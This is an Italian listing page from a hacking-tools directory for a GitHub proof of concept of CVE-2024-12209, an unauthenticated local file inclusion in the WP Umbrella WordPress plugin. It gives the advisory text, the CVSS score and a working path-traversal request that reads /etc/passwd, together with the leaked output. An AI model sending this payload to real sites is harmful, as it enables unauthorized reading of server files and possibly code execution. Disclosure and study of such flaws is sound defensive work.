Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-12209 — WP Umbrella: Aggiornamento, Backup, Ripristino e Monitoraggio <= 2.17.0 - Inclusione di file locale non autenticata | Kitploit
Strumenti/GitHubGitHub/randomrobbiebf/cve-2024-12209
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubrandomrobbiebf/cve-2024-12209

CVE-2024-12209

WP Umbrella: Aggiornamento, Backup, Ripristino e Monitoraggio <= 2.17.0 - Inclusione di file locale non autenticata

Vedi Repository
111 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-12209

WP Umbrella: Update Backup Restore & Monitoring <= 2.17.0 - Inclusione di File Locale Non Autenticata

Descrizione

Il plugin WP Umbrella: Update Backup Restore & Monitoring per WordPress è vulnerabile all'Inclusione di File Locale in tutte le versioni fino alla 2.17.0 inclusa, tramite il parametro 'filename' dell'azione 'umbrella-restore'. Ciò consente ad attaccanti non autenticati di includere ed eseguire file arbitrari sul server, permettendo l'esecuzione di qualsiasi codice PHP presente in tali file. Questo può essere utilizzato per aggirare i controlli di accesso, ottenere dati sensibili o raggiungere l'esecuzione di codice nei casi in cui immagini e altri tipi di file "sicuri" possano essere caricati e inclusi.

Dettagli

  • Tipo: plugin
  • Slug: wp-health
  • Versione Affetta: 2.17.0
  • Punteggio CVSS: 9.8
  • Valutazione CVSS: Critico
  • Vettore CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2024-12209
  • Stato: Attivo

POC

root@kitploit:~
https://wp-dev.ddev.site/?umbrella-restore=1&filename=../../../../../../etc/passwd
root@kitploit:~
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
Scarica lo strumento